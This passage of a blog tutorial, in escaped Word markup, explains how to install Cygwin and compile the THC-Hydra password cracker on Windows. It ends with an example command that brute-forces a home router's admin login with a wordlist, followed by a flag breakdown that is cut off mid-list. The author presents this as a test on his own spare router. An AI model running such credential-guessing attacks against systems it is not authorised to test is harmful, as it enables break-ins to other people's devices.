mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;Latest source for THCHydra (currently v6.3), available here: &lt;/span&gt;&lt;a href="http://www.thc.org/download.php?t=r&amp;amp;f=hydra-6.3-src.tar.gz"&gt;&lt;span style="font-family: Calibri;"&gt;http://www.thc.org/download.php?t=r&amp;amp;f=hydra-6.3-src.tar.gz&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 1in; mso-add-space: auto; mso-list: l1 level2 lfo1; text-indent: -0.25in;"&gt;&lt;span style="font-family: &amp;quot;Courier New&amp;quot;; mso-fareast-font-family: &amp;quot;Courier 
New&amp;quot;;"&gt;&lt;span style="mso-list: Ignore;"&gt;o&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: If you are using Linux or already have Cygwin installed and just want intro to THCHydra and how to compile properly just skip the Cygwin steps and move straight to the bottom where we focus on THChydra.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;+=============================================+&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;|&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Steps to Install Cygwin and create environment:&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;|&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;+=============================================+&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;You need to start by downloading the Setup.EXE file from the main site listed above. Just double click on this when you are ready to get started. This will open the initial setup for Cygwin environment, which by default only includes the basic items needed. You can search through them and choose the ones you want/need or choose simply to include everything if you have the space and want to avoid having to troubleshoot missing items later. For example, if for example you wanted to also compile C++ programs you would need to make sure you included the&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;gcc-g++ package and some kind of text editor like Vi or Nano. When running setup.exe, clicking on categories and packages in the package installation screen will provide you with the ability to control what is installed or updated. Another option is to install everything by clicking on the Default field next to the All category. If you have low bandwidth this could take some time as it downloads most of the packages from Internet (like SVN), so go have lunch and a beer, smoke or whatever your fancy and come back in a bit. 
This is what the process should look like for you upon opening the first time through completion with Desktop shortcut created:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img823.imageshack.us/img823/3716/hydra1t.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="http://img823.imageshack.us/img823/3716/hydra1t.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img849.imageshack.us/img849/9415/hydra2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="http://img849.imageshack.us/img849/9415/hydra2.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img694.imageshack.us/img694/5053/hydra3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="172" src="http://img694.imageshack.us/img694/5053/hydra3.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;**NOTE**: You can choose to only install the basics and add what you want in later, but to keep things easy and avoid having to trouble shoot to many issues I suggest just pick "ALL". Today's HDDs are getting larger and cheaper so I doubt many will have any issues due to space if you select ALL (mine was 8.29Gb total disk space once completely installed with all packages). If you want to go more advanced and select only what you need feel free, be aware that to use the GUI for THChydra, known as XHYDRA, you will need to ensure you also chose to install the proper Cygwin/X requirements as well as the basics since it relies on x-Server and Cygwin/X consists of X server, X libraries, and nearly all of the standard X clients.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img863.imageshack.us/img863/8239/hydra4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="216" src="http://img863.imageshack.us/img863/8239/hydra4.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;When you are done Setup.EXE saves everything and creates a shortcut on your desktop as well as in the start menu. 
You can then use the Setup.EXE file any time you want to update or install a new Cygwin package, as once you have gone through the initial install choices it will remember your final configuration options so anytime you run it again it will open and allow you to choose to update your system by selecting additional packages.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Installed and working console should look like this; just double click your shortcut on desktop:&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img847.imageshack.us/img847/3673/hydra5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://img847.imageshack.us/img847/3673/hydra5.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img32.imageshack.us/img32/6153/hydra6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="208" src="http://img32.imageshack.us/img32/6153/hydra6.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Now you can test it out by issuing a few commands that you wouldn’t normally have use to in Windows that are common Linux commands. 
Here is a quick view of: "pwd", "cd /", "ls", "ps":&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img716.imageshack.us/img716/3431/hydra7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="193" src="http://img716.imageshack.us/img716/3431/hydra7.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;**NOTE: If you are trying to find your main Windows OS drive you need to navigate to it through the "cygwindrive" located in the root folder of Cygwin environment. Here is a quick example: &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;EXAMPLE: cd /cygdrive/&amp;lt;drive letter&amp;gt;/Users/&amp;lt;username&amp;gt;/path/location&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;For me I use the following to get to my main OS desktop area: &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt; text-indent: 0.5in;"&gt;&lt;span style="font-family: Calibri;"&gt;COMMAND: cd /cygdrive/c/Users/SkyWalker/Desktop&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Now to copy the downloaded hydra tar file from our main OS desktop to our Cygwin desktop use this:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Example: cp hydra-6.3-src.tar.gz /home/&amp;lt;cygwin-username&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Mine: cp hydra-6.3-src.tar.gz /home/SkyWalker&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 2;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Then: cd /home/SkyWalker &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 2;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Then: ls (to confirm it was copied to where we wanted 
it)&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img716.imageshack.us/img716/5205/hydra8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="193" src="http://img716.imageshack.us/img716/5205/hydra8.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;span style="font-family: Calibri;"&gt;This ends our brief overview and review for installing Cygwin, please spend time on the homesite and reading the user guide to figure out all the ins and outs of it. If for some reason you decide you want to remove one of the installed Cygwin packages you will simply need to re-run the Setup.EXE file. Once it is open you simply navigate the list of packages that are already installed, and choose the category you want to edit (or click on the View button). Click on the options until it changes to Uninstall and then choose next to finalize the removal of the desired package (just click till you get there, it goes: Default&amp;gt;Install&amp;gt;ReInstall&amp;gt;UnInstall). &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If you want to remove it entirely from your system simply stop all services from running and delete all files, folders and subdirectories as well as any Desktop shortcuts from your machine and from the Setup.EXE install folder and it will be gone. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;+=====================================================+&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;|&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;Steps to Compile THCHydra, once Cygwin is operational&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;|&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;+=====================================================+&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;I have showed you above how you can move the THCHydra tar file from where ever you downloaded it so we can start working with it. 
Now navigate their using your Cygwin terminal, and we will begin by extracting the contents of the download using the following command:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: tar -zxvf hydra-6.3-src.tar.gz&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt 1in;"&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: you can add "-C /desired/path/location" to the end of the command to extract it to another location other than where you currently are located&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img844.imageshack.us/img844/3695/hydra9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://img844.imageshack.us/img844/3695/hydra9.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;OK, now that it is extracted you will have a new folder called hydra-6.3-src and inside you will find the contents of what was extracted, but we still need to compile it in order to get it working (you can delete the original tar file when we are done extracting). 
In order to compile the program you will need to use the following commands from the terminal (the first one changes into the folder that tar just created inside your current directory):&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND:&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;cd hydra-6.3-src&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND:&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;./configure&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND:&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;make&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND:&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp; &lt;/span&gt;make install (THIS IS ERROR PRONE ON CYGWIN)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="http://img18.imageshack.us/img18/963/hydra10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://img18.imageshack.us/img18/963/hydra10.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img204.imageshack.us/img204/369/hydra11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://img204.imageshack.us/img204/369/hydra11.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img269.imageshack.us/img269/8273/hydra12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://img269.imageshack.us/img269/8273/hydra12.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;NOTE: The last one, make install, is not required, but it installs the binary into the local path so you do not always have to navigate to the install folder to run it. This is mainly for my Linux users, as it doesn’t work properly in the Cygwin environment due to the default paths being different, and the errors can be ignored. You can edit this if needed to try and get it working, or simply navigate to the hydra folder before running it each time. If you want to add SSH you need to set up libssh on your machine as well (available at: http://www.libssh.org), and you will also need to add the "-DWITH_SSH1=On" argument to the first make command (i.e. ./configure&amp;gt;make -DWITH_SSH1=On&amp;gt;make install). The default make will also set up the necessary requirements for Xhydra if you have all of the dependencies needed; however, I should mention that it is not functional in the Cygwin environment due to issues with the GTK+ front end and Cygwin X Server. 
I previously had XHYDRA working, but it now seems to fail due to multiple errors, and I am not a real programmer and don’t quite have the time to troubleshoot it. If you know anyone that is good with GTK programs then you might be able to fix the errors when it runs under Cygwin/X (just start X Server and then X-terminal and then run ./xhydra at the command line in X-terminal to start the GUI. It will appear to be fine until you hit start to run it). Until then, XHYDRA only works in a 100% real Linux environment.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Now let us confirm we did not waste our time for nothing, check successful installation by issuing the following command to bring up the help menu and see all of the available options:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;COMMAND: ./hydra -h&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img688.imageshack.us/img688/669/hydra13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img688.imageshack.us/img688/669/hydra13.png" t8="true" width="262" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;I will not go into great detail as the user guide is chalked full of details and there are already a lot of other tutorials on the net the cover how to use it, but not a lot on how to get it working on Windows (which is why I wrote this article). In order to get you started I will show you a quick example of cracking password on a basic home router user/pass for my network with Hydra (I am using a spare Netgear home router for this test), it goes a little something like this...&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;COMMAND: hydra -l admin -P /path/to/wordlist/passwords.txt -e ns -t 15 -f -s -vV 192.168.1.1 http-get -m /&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Here is how it breaks down:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-l" defins the username to use for all attempts&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-P" defines password to use or the path to use for wordlist to read passwords while attacking&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-e ns" instructs Hydra to attempt check for valid NULL connection (meaning blank or 
no password used)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-t x" defines the thread count to be used, or how many tasks at once (where x = a number)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-f" instructs Hydra to exit upon finding the first set of valid credentials or user/pass combo&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-s" instruct Hydra to use SSL for connection&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: 
auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;the "-vV" simply puts Hydra into verbose mode so you see what is going on while it is running&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;"192.168.1.1" is being used as the IP address we are targeting (simply change to fit your need)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 22.5pt; mso-add-space: auto; mso-list: l0 level1 lfo2; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New 